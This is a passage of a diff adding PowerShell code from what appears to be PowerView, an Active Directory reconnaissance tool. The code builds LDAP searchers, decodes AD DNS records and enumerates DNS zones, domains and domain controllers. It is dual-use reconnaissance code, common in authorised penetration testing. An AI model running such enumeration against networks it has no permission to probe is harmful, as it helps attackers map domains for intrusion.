+ elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) {
+ # convert timestamps
+ if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+ # if we have a System.__ComObject
+ $Temp = $Properties[$_][0]
+ [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
+ }
+ else {
+ # otherwise just a string
+ $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
+ }
+ }
+ elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+ # try to convert misc com objects
+ $Prop = $Properties[$_]
+ try {
+ $Temp = $Prop[$_][0]
+ [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+ $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
+ }
+ catch {
+ Write-Verbose "[Convert-LDAPProperty] error: $_"
+ $ObjectProperties[$_] = $Prop[$_]
+ }
+ }
+ elseif ($Properties[$_].count -eq 1) {
+ $ObjectProperties[$_] = $Properties[$_][0]
+ }
+ else {
+ $ObjectProperties[$_] = $Properties[$_]
+ }
+ }
+ }
+ try {
+ New-Object -TypeName PSObject -Property $ObjectProperties
+ }
+ catch {
+ Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_"
+ }
+}
+
+
+########################################################
+#
+# Domain info functions below.
+#
+########################################################
+
+function Get-DomainSearcher {
+<#
+.SYNOPSIS
+
+Helper used by various functions that builds a custom AD searcher object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain
+
+.DESCRIPTION
+
+Takes a given domain and a number of customizations and returns a
+System.DirectoryServices.DirectorySearcher object. This function is used
+heavily by other LDAP/ADSI searcher functions (Verb-Domain*).
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER SearchBasePrefix
+
+Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration").
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainSearcher -Domain testlab.local
+
+Return a searcher for all objects in testlab.local.
+
+.EXAMPLE
+
+Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'
+
+Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.
+
+.EXAMPLE
+
+Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
+
+Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU).
+
+.OUTPUTS
+
+System.DirectoryServices.DirectorySearcher
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.DirectoryServices.DirectorySearcher')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $SearchBasePrefix,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit = 120,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $TargetDomain = $Domain
+
+ if ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) {
+ # see if we can grab the user DNS logon domain from environment variables
+ $UserDomain = $ENV:USERDNSDOMAIN
+ if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $UserDomain) {
+ $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$UserDomain"
+ }
+ }
+ }
+ elseif ($PSBoundParameters['Credential']) {
+ # if not -Domain is specified, but -Credential is, try to retrieve the current domain name with Get-Domain
+ $DomainObject = Get-Domain -Credential $Credential
+ $BindServer = ($DomainObject.PdcRoleOwner).Name
+ $TargetDomain = $DomainObject.Name
+ }
+ elseif ($ENV:USERDNSDOMAIN -and ($ENV:USERDNSDOMAIN.Trim() -ne '')) {
+ # see if we can grab the user DNS logon domain from environment variables
+ $TargetDomain = $ENV:USERDNSDOMAIN
+ if ($ENV:LOGONSERVER -and ($ENV:LOGONSERVER.Trim() -ne '') -and $TargetDomain) {
+ $BindServer = "$($ENV:LOGONSERVER -replace '\\','').$TargetDomain"
+ }
+ }
+ else {
+ # otherwise, resort to Get-Domain to retrieve the current domain object
+ write-verbose "get-domain"
+ $DomainObject = Get-Domain
+ $BindServer = ($DomainObject.PdcRoleOwner).Name
+ $TargetDomain = $DomainObject.Name
+ }
+
+ if ($PSBoundParameters['Server']) {
+ # if there's not a specified server to bind to, try to pull a logon server from ENV variables
+ $BindServer = $Server
+ }
+
+ $SearchString = 'LDAP://'
+
+ if ($BindServer -and ($BindServer.Trim() -ne '')) {
+ $SearchString += $BindServer
+ if ($TargetDomain) {
+ $SearchString += '/'
+ }
+ }
+
+ if ($PSBoundParameters['SearchBasePrefix']) {
+ $SearchString += $SearchBasePrefix + ','
+ }
+
+ if ($PSBoundParameters['SearchBase']) {
+ if ($SearchBase -Match '^GC://') {
+ # if we're searching the global catalog, get the path in the right format
+ $DN = $SearchBase.ToUpper().Trim('/')
+ $SearchString = ''
+ }
+ else {
+ if ($SearchBase -match '^LDAP://') {
+ if ($SearchBase -match "LDAP://.+/.+") {
+ $SearchString = ''
+ $DN = $SearchBase
+ }
+ else {
+ $DN = $SearchBase.SubString(7)
+ }
+ }
+ else {
+ $DN = $SearchBase
+ }
+ }
+ }
+ else {
+ # transform the target domain name into a distinguishedName if an ADS search base is not specified
+ if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {
+ $DN = "DC=$($TargetDomain.Replace('.', ',DC='))"
+ }
+ }
+
+ $SearchString += $DN
+ Write-Verbose "[Get-DomainSearcher] search base: $SearchString"
+
+ if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
+ Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection"
+ # bind to the inital search object using alternate credentials
+ $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+ $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
+ }
+ else {
+ # bind to the inital object using the current credentials
+ $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
+ }
+
+ $Searcher.PageSize = $ResultPageSize
+ $Searcher.SearchScope = $SearchScope
+ $Searcher.CacheResults = $False
+ $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All
+
+ if ($PSBoundParameters['ServerTimeLimit']) {
+ $Searcher.ServerTimeLimit = $ServerTimeLimit
+ }
+
+ if ($PSBoundParameters['Tombstone']) {
+ $Searcher.Tombstone = $True
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ $Searcher.filter = $LDAPFilter
+ }
+
+ if ($PSBoundParameters['SecurityMasks']) {
+ $Searcher.SecurityMasks = Switch ($SecurityMasks) {
+ 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }
+ 'Group' { [System.DirectoryServices.SecurityMasks]::Group }
+ 'None' { [System.DirectoryServices.SecurityMasks]::None }
+ 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }
+ 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }
+ }
+ }
+
+ if ($PSBoundParameters['Properties']) {
+ # handle an array of properties to load w/ the possibility of comma-separated strings
+ $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }
+ $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))
+ }
+
+ $Searcher
+ }
+}
+
+
+function Convert-DNSRecord {
+<#
+.SYNOPSIS
+
+Helpers that decodes a binary DNS record blob.
+
+Author: Michael B. Smith, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Decodes a binary blob representing an Active Directory DNS entry.
+Used by Get-DomainDNSRecord.
+
+Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+
+.PARAMETER DNSRecord
+
+A byte array representing the DNS record.
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+.LINK
+
+https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+#>
+
+ [OutputType('System.Management.Automation.PSCustomObject')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [Byte[]]
+ $DNSRecord
+ )
+
+ BEGIN {
+ function Get-Name {
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')]
+ [CmdletBinding()]
+ Param(
+ [Byte[]]
+ $Raw
+ )
+
+ [Int]$Length = $Raw[0]
+ [Int]$Segments = $Raw[1]
+ [Int]$Index = 2
+ [String]$Name = ''
+
+ while ($Segments-- -gt 0)
+ {
+ [Int]$SegmentLength = $Raw[$Index++]
+ while ($SegmentLength-- -gt 0) {
+ $Name += [Char]$Raw[$Index++]
+ }
+ $Name += "."
+ }
+ $Name
+ }
+ }
+
+ PROCESS {
+ # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
+ $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
+ $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
+
+ $TTLRaw = $DNSRecord[12..15]
+
+ # reverse for big endian
+ $Null = [array]::Reverse($TTLRaw)
+ $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
+
+ $Age = [BitConverter]::ToUInt32($DNSRecord, 20)
+ if ($Age -ne 0) {
+ $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
+ }
+ else {
+ $TimeStamp = '[static]'
+ }
+
+ $DNSRecordObject = New-Object PSObject
+
+ if ($RDataType -eq 1) {
+ $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
+ $Data = $IP
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
+ }
+
+ elseif ($RDataType -eq 2) {
+ $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
+ $Data = $NSName
+ $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
+ }
+
+ elseif ($RDataType -eq 5) {
+ $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
+ $Data = $Alias
+ $DNSRecordObject | Add-Member Noteproperty 
'RecordType' 'CNAME' + } + + elseif ($RDataType -eq 6) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA' + } + + elseif ($RDataType -eq 12) { + $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length] + $Data = $Ptr + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR' + } + + elseif ($RDataType -eq 13) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO' + } + + elseif ($RDataType -eq 15) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX' + } + + elseif ($RDataType -eq 16) { + [string]$TXT = '' + [int]$SegmentLength = $DNSRecord[24] + $Index = 25 + + while ($SegmentLength-- -gt 0) { + $TXT += [char]$DNSRecord[$index++] + } + + $Data = $TXT + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT' + } + + elseif ($RDataType -eq 28) { + # TODO: how to implement properly? nested object? + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA' + } + + elseif ($RDataType -eq 33) { + # TODO: how to implement properly? nested object? 
+ $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV' + } + + else { + $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) + $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN' + } + + $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial + $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL + $DNSRecordObject | Add-Member Noteproperty 'Age' $Age + $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp + $DNSRecordObject | Add-Member Noteproperty 'Data' $Data + $DNSRecordObject + } +} + + +function Get-DomainDNSZone { +<# +.SYNOPSIS + +Enumerates the Active Directory DNS zones for a given domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.PARAMETER Domain + +The domain to query for zones, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the search. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDNSZone + +Retrieves the DNS zones for the current domain. + +.EXAMPLE + +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local + +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. + +.OUTPUTS + +PowerView.DNSZone + +Outputs custom PSObjects with detailed information about the DNS zone. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSZone')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsZone)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher1 = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher1) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher1.FindOne() } + else { $Results = $DNSSearcher1.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } + + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" + } + } + $DNSSearcher1.dispose() + } + + 
$SearcherArguments['SearchBasePrefix'] = 'CN=MicrosoftDNS,DC=DomainDnsZones' + $DNSSearcher2 = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher2) { + try { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher2.FindOne() } + else { $Results = $DNSSearcher2.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + $Out = Convert-LDAPProperty -Properties $_.Properties + $Out | Add-Member NoteProperty 'ZoneName' $Out.name + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSZone') + $Out + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSZone] Error disposing of the Results object: $_" + } + } + } + catch { + Write-Verbose "[Get-DomainDNSZone] Error accessing 'CN=MicrosoftDNS,DC=DomainDnsZones'" + } + $DNSSearcher2.dispose() + } + } +} + + +function Get-DomainDNSRecord { +<# +.SYNOPSIS + +Enumerates the Active Directory DNS records for a given zone. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord + +.DESCRIPTION + +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. + +.PARAMETER ZoneName + +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). + +.PARAMETER Domain + +The domain to query for zones, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to for the search. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER FindOne + +Only return one result object. 
+ +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDNSRecord -ZoneName testlab.local + +Retrieve all records for the testlab.local zone. + +.EXAMPLE + +Get-DomainDNSZone | Get-DomainDNSRecord + +Retrieve all records for all zones in the current domain. + +.EXAMPLE + +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local + +Retrieve all records for all zones in the dev.testlab.local domain. + +.OUTPUTS + +PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DNSRecord')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $ZoneName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties = 'name,distinguishedname,dnsrecord,whencreated,whenchanged', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $SearcherArguments = @{ + 'LDAPFilter' = '(objectClass=dnsNode)' + 'SearchBasePrefix' = "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones" + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if 
($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $DNSSearcher = Get-DomainSearcher @SearcherArguments + + if ($DNSSearcher) { + if ($PSBoundParameters['FindOne']) { $Results = $DNSSearcher.FindOne() } + else { $Results = $DNSSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + try { + $Out = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged + $Out | Add-Member NoteProperty 'ZoneName' $ZoneName + + # convert the record and extract the properties + if ($Out.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { + # TODO: handle multiple nested records properly? + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord[0] + } + else { + $Record = Convert-DNSRecord -DNSRecord $Out.dnsrecord + } + + if ($Record) { + $Record.PSObject.Properties | ForEach-Object { + $Out | Add-Member NoteProperty $_.Name $_.Value + } + } + + $Out.PSObject.TypeNames.Insert(0, 'PowerView.DNSRecord') + $Out + } + catch { + Write-Warning "[Get-DomainDNSRecord] Error: $_" + $Out + } + } + + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDNSRecord] Error disposing of the Results object: $_" + } + } + $DNSSearcher.dispose() + } + } +} + + +function Get-Domain { +<# +.SYNOPSIS + +Returns the domain object for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current +domain or the domain specified with -Domain X. + +.PARAMETER Domain + +Specifies the domain name to query for, defaults to the current domain. 
+ +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-Domain -Domain testlab.local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Domain -Credential $Cred + +.OUTPUTS + +System.DirectoryServices.ActiveDirectory.Domain + +A complex .NET domain object. + +.LINK + +http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG +#> + + [OutputType([System.DirectoryServices.ActiveDirectory.Domain])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + if ($PSBoundParameters['Credential']) { + + Write-Verbose '[Get-Domain] Using alternate credentials for Get-Domain' + + if ($PSBoundParameters['Domain']) { + $TargetDomain = $Domain + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetDomain = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Domain] Extracted domain '$TargetDomain' from -Credential" + } + + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) + + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) + } + catch { + Write-Verbose "[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" + } + } + elseif ($PSBoundParameters['Domain']) { + 
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) + } + catch { + Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_" + } + } + else { + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() + } + catch { + Write-Verbose "[Get-Domain] Error retrieving the current domain: $_" + } + } + } +} + + +function Get-DomainController { +<# +.SYNOPSIS + +Return the domain controllers for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain + +.DESCRIPTION + +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer +to search for domain controllers. + +.PARAMETER Domain + +The domain to query for domain controllers, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER LDAP + +Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainController -Domain 'test.local' + +Determine the domain controllers for 'test.local'. + +.EXAMPLE + +Get-DomainController -Domain 'test.local' -LDAP + +Determine the domain controllers for 'test.local' using LDAP queries. + +.EXAMPLE + +'test.local' | Get-DomainController + +Determine the domain controllers for 'test.local'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred + +.OUTPUTS + +PowerView.Computer + +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. + +System.DirectoryServices.ActiveDirectory.DomainController + +If -LDAP isn't specified. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Computer')] + [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [Switch] + $LDAP, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) { + if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server } + + # UAC specification for domain controllers + $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + + Get-DomainComputer @Arguments + } + else { + $FoundDomain = Get-Domain @Arguments + if ($FoundDomain) { + $FoundDomain.DomainControllers + } + } + } +} + + +function Get-Forest { +<# +.SYNOPSIS + +Returns the forest object for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID + +.DESCRIPTION + +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. + +.PARAMETER Forest + +The forest name to query for, defaults to the current forest. 
